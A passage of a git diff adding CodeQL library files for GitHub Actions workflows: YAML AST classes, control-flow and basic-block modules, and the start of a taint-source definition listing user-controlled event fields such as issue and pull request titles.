ID. */ + Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + } + + /** + * An Actions On trigger within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#on. + */ + class On extends YamlNode, YamlMappingLikeNode { + Workflow workflow; + + On() { workflow.lookup("on") = this } + + /** Gets the workflow that this trigger is in. */ + Workflow getWorkflow() { result = workflow } + } + + /** A common class for `env` in workflow, job or step. */ + abstract class Env extends YamlNode, YamlMapping { } + + /** A workflow level `env` mapping. */ + class WorkflowEnv extends Env { + Workflow workflow; + + WorkflowEnv() { workflow.lookup("env") = this } + + /** Gets the workflow this field belongs to. */ + Workflow getWorkflow() { result = workflow } + } + + /** A job level `env` mapping. */ + class JobEnv extends Env { + Job job; + + JobEnv() { job.lookup("env") = this } + + /** Gets the job this field belongs to. */ + Job getJob() { result = job } + } + + /** A step level `env` mapping. */ + class StepEnv extends Env { + Step step; + + StepEnv() { step.lookup("env") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * An Actions job within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ + class Job extends StepsContainer { + string jobId; + Workflow workflow; + + Job() { this = workflow.getJobs().lookup(jobId) } + + /** + * Gets the ID of this job, as a string. + * This is the job's key within the `jobs` mapping. + */ + string getId() { result = jobId } + + /** + * Gets the ID of this job, as a YAML scalar node. + * This is the job's key within the `jobs` mapping. + */ + YamlString getIdNode() { workflow.getJobs().maps(result, this) } + + /** Gets the human-readable name of this job, if any, as a string. */ + string getName() { result = this.getNameNode().getValue() } + + /** Gets the human-readable name of this job, if any, as a YAML scalar node. */ + YamlString getNameNode() { result = this.lookup("name") } + + /** Gets the step at the given index within this job. */ + Step getStep(int index) { result.getJob() = this and result.getIndex() = index } + + /** Gets the `env` mapping in this job. */ + JobEnv getEnv() { result = this.lookup("env") } + + /** Gets the workflow this job belongs to. */ + Workflow getWorkflow() { result = workflow } + + /** Gets the value of the `if` field in this job, if any. */ + JobIf getIf() { result.getJob() = this } + + /** Gets the value of the `runs-on` field in this job. */ + JobRunson getRunsOn() { result.getJob() = this } + } + + /** + * An `if` within a job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idif. + */ + class JobIf extends YamlNode, YamlScalar { + Job job; + + JobIf() { job.lookup("if") = this } + + /** Gets the step this field belongs to. */ + Job getJob() { result = job } + } + + /** + * A `runs-on` within a job. + * See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idruns-on. + */ + class JobRunson extends YamlNode, YamlScalar { + Job job; + + JobRunson() { job.lookup("runs-on") = this } + + /** Gets the step this field belongs to. */ + Job getJob() { result = job } + } + + /** + * A step within an Actions job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. + */ + class Step extends YamlNode, YamlMapping { + int index; + StepsContainer parent; + + Step() { this = parent.getSteps().getElement(index) } + + /** Gets the 0-based position of this step within the sequence of `steps`. */ + int getIndex() { result = index } + + /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ + Job getJob() { result = parent } + + /** Gets the `runs` this step belongs to, if the step belongs to a `runs` in a custom composite action. Has no result if the step belongs to a `job` in a workflow. */ + Runs getRuns() { result = parent } + + /** Gets the value of the `uses` field in this step, if any. */ + Uses getUses() { result.getStep() = this } + + /** Gets the value of the `run` field in this step, if any. */ + Run getRun() { result.getStep() = this } + + /** Gets the value of the `if` field in this step, if any. */ + StepIf getIf() { result.getStep() = this } + + /** Gets the value of the `env` field in this step, if any. */ + StepEnv getEnv() { result = this.lookup("env") } + + /** Gets the ID of this step, if any. */ + string getId() { result = this.lookup("id").(YamlString).getValue() } + } + + /** + * An `if` within a step. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsif. + */ + class StepIf extends YamlNode, YamlScalar { + Step step; + + StepIf() { step.lookup("if") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ + private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + + /** + * A `uses` field within an Actions job step, which references an action as a reusable unit of code. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsuses. + * + * For example: + * ``` + * uses: actions/checkout@v2 + * ``` + * + * Does not handle local repository references, e.g. `.github/actions/action-name`. + */ + class Uses extends YamlNode, YamlScalar { + Step step; + + Uses() { step.lookup("uses") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + string getGitHubRepository() { + result = + this.getValue().regexpCapture(usesParser(), 1) + "/" + + this.getValue().regexpCapture(usesParser(), 2) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + string getVersion() { result = this.getValue().regexpCapture(usesParser(), 3) } + } + + /** + * A `with` field within an Actions job step, which references an action as a reusable unit of code. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepswith. + * + * For example: + * ``` + * with: + * arg1: 1 + * arg2: abc + * ``` + */ + class With extends YamlNode, YamlMapping { + Step step; + + With() { step.lookup("with") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * A `ref:` field within an Actions `with:` specific to `actions/checkout` action. + * + * For example: + * ``` + * uses: actions/checkout@v2 + * with: + * ref: ${{ github.event.pull_request.head.sha }} + * ``` + */ + class Ref extends YamlNode, YamlString { + With with; + + Ref() { with.lookup("ref") = this } + + /** Gets the `with` field this field belongs to. */ + With getWith() { result = with } + } + + /** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ + string getASimpleReferenceExpression(YamlString node) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + node.getValue() + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) + .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + } + + /** Extracts the 'name' part from env.name */ + bindingset[name] + string getEnvName(string name) { result = name.regexpCapture("env\\.([A-Za-z0-9_]+)", 1) } + + /** + * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. + */ + class Run extends YamlNode, YamlString { + Step step; + + Run() { step.lookup("run") = this } + + /** Gets the step that executes this `run` command. */ + Step getStep() { result = step } + } + + /** + * ALVARO + * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds + */ + class Needs extends YamlNode { + Job job; + + Needs() { job.lookup("needs") = this } + + Job getJob() { result = job } + + Job getANeededJob() { + if this instanceof YamlString + then result.getId() = this.(YamlString).getValue() and result.getFile() = job.getFile() + else + if this instanceof YamlSequence + then + result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + result.getFile() = job.getFile() + else none() + } + } +} diff --git a/ql/lib/codeql/actions/ast/internal/Yaml.qll b/ql/lib/codeql/actions/ast/internal/Yaml.qll new file mode 100644 index 000000000000..402ceae44ced --- /dev/null +++ b/ql/lib/codeql/actions/ast/internal/Yaml.qll @@ -0,0 +1,50 @@ +/** + * Provides classes for working with YAML data. + * + * YAML documents are represented as abstract syntax trees whose nodes + * are either YAML values or alias nodes referring to another YAML value. + */ + +private import codeql.yaml.Yaml as LibYaml + +private module YamlSig implements LibYaml::InputSig { + import codeql.Locations + + class LocatableBase extends @yaml_locatable { + Location getLocation() { yaml_locations(this, result) } + + string toString() { none() } + } + + class NodeBase extends LocatableBase, @yaml_node { + NodeBase getChildNode(int i) { yaml(result, _, this, i, _, _) } + + string getTag() { yaml(this, _, _, _, result, _) } + + string getAnchor() { yaml_anchors(this, result) } + + override string toString() { yaml(this, _, _, _, _, result) } + } + + class ScalarNodeBase extends NodeBase, @yaml_scalar_node { + int getStyle() { yaml_scalars(this, result, _) } + + string getValue() { yaml_scalars(this, _, result) } + } + + class CollectionNodeBase extends NodeBase, @yaml_collection_node { } + + class MappingNodeBase extends CollectionNodeBase, @yaml_mapping_node { } + + class SequenceNodeBase extends CollectionNodeBase, @yaml_sequence_node { } + + class AliasNodeBase extends NodeBase, @yaml_alias_node { + string getTarget() { yaml_aliases(this, result) } + } + + class ParseErrorBase extends LocatableBase, @yaml_error { + string getMessage() { yaml_errors(this, result) } + } +} + +import LibYaml::Make diff --git a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll new file mode 100644 index 000000000000..cdc7b0cf24f1 --- /dev/null +++ b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll @@ -0,0 +1,445 @@ +/** Provides classes representing basic blocks. */ + +private import codeql.actions.Cfg +private import codeql.actions.Ast +private import codeql.Locations + +/** + * A basic block, that is, a maximal straight-line sequence of control flow nodes + * without branches or joins. + */ +class BasicBlock extends TBasicBlockStart { + /** Gets the scope of this basic block. */ + final CfgScope getScope() { result = this.getFirstNode().getScope() } + + /** Gets an immediate successor of this basic block, if any. */ + BasicBlock getASuccessor() { result = this.getASuccessor(_) } + + /** Gets an immediate successor of this basic block of a given type, if any. */ + BasicBlock getASuccessor(SuccessorType t) { + result.getFirstNode() = this.getLastNode().getASuccessor(t) + } + + /** Gets an immediate predecessor of this basic block, if any. */ + BasicBlock getAPredecessor() { result.getASuccessor() = this } + + /** Gets an immediate predecessor of this basic block of a given type, if any. */ + BasicBlock getAPredecessor(SuccessorType t) { result.getASuccessor(t) = this } + + /** Gets the control flow node at a specific (zero-indexed) position in this basic block. */ + Node getNode(int pos) { bbIndex(this.getFirstNode(), result, pos) } + + /** Gets a control flow node in this basic block. */ + Node getANode() { result = this.getNode(_) } + + /** Gets the first control flow node in this basic block. */ + Node getFirstNode() { this = TBasicBlockStart(result) } + + /** Gets the last control flow node in this basic block. */ + Node getLastNode() { result = this.getNode(this.length() - 1) } + + /** Gets the length of this basic block. */ + int length() { result = strictcount(this.getANode()) } + + /** + * Holds if this basic block immediately dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which is an immediate + * predecessor of `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 immediately dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate immediatelyDominates(BasicBlock bb) { bbIDominates(this, bb) } + + /** + * Holds if this basic block strictly dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 strictly dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate strictlyDominates(BasicBlock bb) { bbIDominates+(this, bb) } + + /** + * Holds if this basic block dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 dominates the basic + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate dominates(BasicBlock bb) { + bb = this or + this.strictlyDominates(bb) + } + + /** + * Holds if `df` is in the dominance frontier of this basic block. + * That is, this basic block dominates a predecessor of `df`, but + * does not dominate `df` itself. + * + * Example: + * + * ```rb + * def m x + * if x < 0 + * x = -x + * if x > 10 + * x = x - 1 + * end + * end + * puts x + * end + * ``` + * + * The basic block on line 8 is in the dominance frontier + * of the basic block starting on line 3 because that block + * dominates the basic block on line 4, which is a predecessor of + * `puts x`. Also, the basic block starting on line 3 does not + * dominate the basic block on line 8. + */ + predicate inDominanceFrontier(BasicBlock df) { + this.dominatesPredecessor(df) and + not this.strictlyDominates(df) + } + + /** + * Holds if this basic block dominates a predecessor of `df`. + */ + private predicate dominatesPredecessor(BasicBlock df) { this.dominates(df.getAPredecessor()) } + + /** + * Gets the basic block that immediately dominates this basic block, if any. + * + * That is, all paths reaching this basic block from some entry point + * basic block must go through the result, which is an immediate basic block + * predecessor of this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 is an immediate dominator of + * the basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block, and the `if` block + * is an immediate predecessor of `return 1`). + */ + BasicBlock getImmediateDominator() { bbIDominates(result, this) } + + /** + * Holds if this basic block strictly post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 strictly post-dominates the basic block on + * line 3 (all paths to the exit point of `m` from `puts "b"` must go + * through `puts "m"`). + */ + predicate strictlyPostDominates(BasicBlock bb) { bbIPostDominates+(this, bb) } + + /** + * Holds if this basic block post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 post-dominates the basic block on line 3 + * (all paths to the exit point of `m` from `puts "b"` must go through + * `puts "m"`). + */ + predicate postDominates(BasicBlock bb) { + this.strictlyPostDominates(bb) or + this = bb + } + + /** Holds if this basic block is in a loop in the control flow graph. */ + predicate inLoop() { this.getASuccessor+() = this } + + /** Gets a textual representation of this basic block. */ + string toString() { result = this.getFirstNode().toString() } + + /** Gets the location of this basic block. */ + Location getLocation() { result = this.getFirstNode().getLocation() } +} + +cached +private module Cached { + /** Internal representation of basic blocks. */ + cached + newtype TBasicBlock = TBasicBlockStart(Node cfn) { startsBB(cfn) } + + /** Holds if `cfn` starts a new basic block. */ + private predicate startsBB(Node cfn) { + not exists(cfn.getAPredecessor()) and exists(cfn.getASuccessor()) + or + cfn.isJoin() + or + cfn.getAPredecessor().isBranch() + or + /* + * In cases such as + * + * ```rb + * if x or y + * foo + * else + * bar + * ``` + * + * we have a CFG that looks like + * + * x --false--> [false] x or y --false--> bar + * \ | + * --true--> y --false-- + * \ + * --true--> [true] x or y --true--> foo + * + * and we want to ensure that both `foo` and `bar` start a new basic block, + * in order to get a `ConditionalBlock` out of the disjunction. + */ + + exists(cfn.getAPredecessor(any(BooleanSuccessor s))) + } + + /** + * Holds if `succ` is a control flow successor of `pred` within + * the same basic block. + */ + private predicate intraBBSucc(Node pred, Node succ) { + succ = pred.getASuccessor() and + not startsBB(succ) + } + + /** + * Holds if `cfn` is the `i`th node in basic block `bb`. + * + * In other words, `i` is the shortest distance from a node `bb` + * that starts a basic block to `cfn` along the `intraBBSucc` relation. + */ + cached + predicate bbIndex(Node bbStart, Node cfn, int i) = + shortestDistances(startsBB/1, intraBBSucc/2)(bbStart, cfn, i) + + /** + * Holds if the first node of basic block `succ` is a control flow + * successor of the last node of basic block `pred`. + */ + private predicate succBB(BasicBlock pred, BasicBlock succ) { succ = pred.getASuccessor() } + + /** Holds if `dom` is an immediate dominator of `bb`. */ + cached + predicate bbIDominates(BasicBlock dom, BasicBlock bb) = + idominance(entryBB/1, succBB/2)(_, dom, bb) + + /** Holds if `pred` is a basic block predecessor of `succ`. */ + private predicate predBB(BasicBlock succ, BasicBlock pred) { succBB(pred, succ) } + + /** Holds if `bb` is an exit basic block that represents normal exit. */ + private predicate normalExitBB(BasicBlock bb) { bb.getANode().(AnnotatedExitNode).isNormal() } + + /** Holds if `dom` is an immediate post-dominator of `bb`. */ + cached + predicate bbIPostDominates(BasicBlock dom, BasicBlock bb) = + idominance(normalExitBB/1, predBB/2)(_, dom, bb) + + /** + * Gets the `i`th predecessor of join block `jb`, with respect to some + * arbitrary order. + */ + cached + JoinBlockPredecessor getJoinBlockPredecessor(JoinBlock jb, int i) { + none() + /* + * result = + * rank[i + 1](JoinBlockPredecessor jbp | + * jbp = jb.getAPredecessor() + * | + * jbp order by JoinBlockPredecessors::getId(jbp), JoinBlockPredecessors::getSplitString(jbp) + * ) + */ + + } + + cached + predicate immediatelyControls(ConditionBlock cb, BasicBlock succ, BooleanSuccessor s) { + succ = cb.getASuccessor(s) and + forall(BasicBlock pred | pred = succ.getAPredecessor() and pred != cb | succ.dominates(pred)) + } + + cached + predicate controls(ConditionBlock cb, BasicBlock controlled, BooleanSuccessor s) { + exists(BasicBlock succ | cb.immediatelyControls(succ, s) | succ.dominates(controlled)) + } +} + +private import Cached + +/** Holds if `bb` is an entry basic block. */ +private predicate entryBB(BasicBlock bb) { bb.getFirstNode() instanceof EntryNode } + +/** + * An entry basic block, that is, a basic block whose first node is + * an entry node. + */ +class EntryBasicBlock extends BasicBlock { + EntryBasicBlock() { entryBB(this) } +} + +/** + * An annotated exit basic block, that is, a basic block whose last node is + * an annotated exit node. + */ +class AnnotatedExitBasicBlock extends BasicBlock { + private boolean normal; + + AnnotatedExitBasicBlock() { + exists(AnnotatedExitNode n | + n = this.getANode() and + if n.isNormal() then normal = true else normal = false + ) + } + + /** Holds if this block represent a normal exit. */ + final predicate isNormal() { normal = true } +} + +/** + * An exit basic block, that is, a basic block whose last node is + * an exit node. + */ +class ExitBasicBlock extends BasicBlock { + ExitBasicBlock() { this.getLastNode() instanceof ExitNode } +} + +/* + * private module JoinBlockPredecessors { + * private predicate id(AstNode x, AstNode y) { x = y } + * + * private predicate idOf(AstNode x, int y) = equivalenceRelation(id/2)(x, y) + * + * int getId(JoinBlockPredecessor jbp) { + * idOf(Ast::toTreeSitter(jbp.getFirstNode().(AstCfgNode).getAstNode()), result) + * or + * idOf(Ast::toTreeSitter(jbp.(EntryBasicBlock).getScope()), result) + * } + * + * string getSplitString(JoinBlockPredecessor jbp) { + * result = jbp.getFirstNode().(AstCfgNode).getSplitsString() + * or + * not exists(jbp.getFirstNode().(AstCfgNode).getSplitsString()) and + * result = "" + * } + * } + */ + +/** A basic block with more than one predecessor. */ +class JoinBlock extends BasicBlock { + JoinBlock() { this.getFirstNode().isJoin() } + + /** + * Gets the `i`th predecessor of this join block, with respect to some + * arbitrary order. + */ + JoinBlockPredecessor getJoinBlockPredecessor(int i) { result = getJoinBlockPredecessor(this, i) } +} + +/** A basic block that is an immediate predecessor of a join block. */ +class JoinBlockPredecessor extends BasicBlock { + JoinBlockPredecessor() { this.getASuccessor() instanceof JoinBlock } +} + +/** A basic block that terminates in a condition, splitting the subsequent control flow. */ +class ConditionBlock extends BasicBlock { + ConditionBlock() { this.getLastNode().isCondition() } + + /** + * Holds if basic block `succ` is immediately controlled by this basic + * block with conditional value `s`. That is, `succ` is an immediate + * successor of this block, and `succ` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. + */ + predicate immediatelyControls(BasicBlock succ, BooleanSuccessor s) { + immediatelyControls(this, succ, s) + } + + /** + * Holds if basic block `controlled` is controlled by this basic block with + * conditional value `s`. That is, `controlled` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. + */ + predicate controls(BasicBlock controlled, BooleanSuccessor s) { controls(this, controlled, s) } +} + diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll new file mode 100644 index 000000000000..8b6696fe777c --- /dev/null +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -0,0 +1,169 @@ +private import codeql.actions.Ast +private import codeql.controlflow.Cfg as CfgShared +private import codeql.Locations + +module Completion { + private newtype TCompletion = + TSimpleCompletion() or + TBooleanCompletion(boolean b) { b in [false, true] } or + TReturnCompletion() + + abstract class Completion extends TCompletion { + abstract string toString(); + + predicate isValidForSpecific(AstNode e) { none() } + + predicate isValidFor(AstNode e) { this.isValidForSpecific(e) } + + abstract SuccessorType getAMatchingSuccessorType(); + } + + abstract class NormalCompletion extends Completion { } + + class SimpleCompletion extends NormalCompletion, TSimpleCompletion { + override string toString() { result = "SimpleCompletion" } + + override predicate isValidFor(AstNode e) { not any(Completion c).isValidForSpecific(e) } + + override NormalSuccessor getAMatchingSuccessorType() { any() } + } + + class BooleanCompletion extends NormalCompletion, TBooleanCompletion { + boolean value; + + BooleanCompletion() { this = TBooleanCompletion(value) } + + override string toString() { result = "BooleanCompletion(" + value + ")" } + + override predicate isValidForSpecific(AstNode e) { + none() + // TODO: add support for conditional expressions? + //e = any(ConditionalExpression c).getCondition() + } + + override BooleanSuccessor getAMatchingSuccessorType() { result.getValue() = value } + + final boolean getValue() { result = value } + } + + class ReturnCompletion extends Completion, TReturnCompletion { + override string toString() { result = "ReturnCompletion" } + + override predicate isValidForSpecific(AstNode e) { none() } + + override ReturnSuccessor getAMatchingSuccessorType() { any() } + } + + cached + private newtype TSuccessorType = + TNormalSuccessor() or + TBooleanSuccessor(boolean b) { b in [false, true] } or + TReturnSuccessor() + + class SuccessorType extends TSuccessorType { + string toString() { none() } + } + + class NormalSuccessor extends SuccessorType, TNormalSuccessor { + override string toString() { result = "successor" } + } + + class BooleanSuccessor extends SuccessorType, TBooleanSuccessor { + boolean value; + + BooleanSuccessor() { this = TBooleanSuccessor(value) } + + override string toString() { result = value.toString() } + + boolean getValue() { result = value } + } + + class ReturnSuccessor extends SuccessorType, TReturnSuccessor { + override string toString() { result = "return" } + } + // Why is there no conditional successor type? +} + +module CfgScope { + abstract class CfgScope extends AstNode { } + + private class JobScope extends CfgScope instanceof JobStmt { } +} + +private module Implementation implements CfgShared::InputSig { + import codeql.actions.Ast + import Completion + import CfgScope + + predicate completionIsNormal(Completion c) { not c instanceof ReturnCompletion } + + // Not using CFG splitting, so the following are just dummy types. + private newtype TUnit = Unit() + + class SplitKindBase = TUnit; + + class Split extends TUnit { + abstract string toString(); + } + + predicate completionIsSimple(Completion c) { c instanceof SimpleCompletion } + + predicate completionIsValidFor(Completion c, AstNode e) { c.isValidFor(e) } + + CfgScope getCfgScope(AstNode e) { + exists(AstNode p | p = e.getParentNode() | + result = p + or + not p instanceof CfgScope and result = getCfgScope(p) + ) + } + + int maxSplits() { result = 0 } + + predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(JobStmt), e) } + + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(JobStmt), e, c) } + + predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } + + predicate successorTypeIsCondition(SuccessorType t) { t instanceof BooleanSuccessor } + + SuccessorType getAMatchingSuccessorType(Completion c) { result = c.getAMatchingSuccessorType() } + + predicate isAbnormalExitType(SuccessorType t) { none() } +} + +module CfgImpl = CfgShared::Make; + +private import CfgImpl +private import Completion +private import CfgScope + +// Trees are what end up creating Cfg::Node objects and therefore DataFlow::Node objects. +// Its also required that there is parent/child relationships between nodes so orphans nodes will not appear as either Cfg::Node or DataFlow::Node. +// For example +// - ArgumentExpr should be children of UsesExpr, and UsesExpr should be children of StepStmt. +// TODO: We need to make VarAccess expressions part ot the tree as they are currently orphans +private class CfgNodeTree extends StandardPreOrderTree instanceof AstNode { + override AstNode getChildNode(int i) { result = super.getChildNodeByOrder(i) } +} +// private class JobStmtTree extends StandardPreOrderTree instanceof JobStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// private class StepStmtTree extends StandardPreOrderTree instanceof StepStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// // TODO: Do we need this or we can just care about the ExprAccessExpr +// private class ArgumentTree extends LeafTree instanceof ArgumentExpr { } +// +// private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } +// +// private class StepOutputAccessTree extends LeafTree instanceof StepOutputAccessExpr { } +// +// private class JobOutputAccessTree extends LeafTree instanceof JobOutputAccessExpr { } \ No newline at end of file diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll new file mode 100644 index 000000000000..5ce82a134ce6 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -0,0 +1,137 @@ +import actions +import codeql.actions.DataFlow + +/** + * A data flow source. + */ +abstract class SourceNode extends DataFlow::Node { + /** + * Gets a string that represents the source kind with respect to threat modeling. + */ + abstract string getThreatModel(); +} + +/** A data flow source of remote user input. */ +abstract class RemoteFlowSource extends SourceNode { + /** Gets a string that describes the type of this remote flow source. */ + abstract string getSourceType(); + + override string getThreatModel() { result = "remote" } +} + +private class ChangedFilesSource extends RemoteFlowSource { + ChangedFilesSource() { + exists(UsesExpr uses | + uses.getTarget() = "tj-actions/changed-files" and + uses.getVersion() = ["v1", "v20", "v30", "v40"] and + uses = this.asExpr() + ) + } + + override string getSourceType() { result = "User-controlled list of changed files" } +} + +bindingset[context] +private predicate isExternalUserControlledIssue(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledPullRequest(string context) { + exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*title\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*body\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*label\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*default_branch\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*description\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*repo\\s*\\.\\s*homepage\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pull_request\\s*\\.\\s*head\\s*\\.\\s*ref\\b", + "\\bgithub\\s*\\.\\s*head_ref\\b" + ] + | + context.regexpMatch(reg) + ) +} + +bindingset[context] +private predicate isExternalUserControlledReview(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*review\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledComment(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*comment\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate isExternalUserControlledGollum(string context) { + context + .regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*page_name\\b") or + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*pages\\[[0-9]+\\]\\s*\\.\\s*title\\b") +} + +bindingset[context] +private predicate isExternalUserControlledCommit(string context) { + exists(string reg | + reg = + [ + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*message\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*author\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*head_commit\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*author\\s*\\.\\s*name\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*email\\b", + "\\bgithub\\s*\\.\\s*event\\s*\\.\\s*commits\\[[0-9]+\\]\\s*\\.\\s*committer\\s*\\.\\s*name\\b", + ] + | + context.regexpMatch(reg) + ) +} + +bindingset[context] +private predicate isExternalUserControlledDiscussion(string context) { + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*title\\b") or + context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*discussion\\s*\\.\\s*body\\b") +} + +bindingset[context] +private predicate 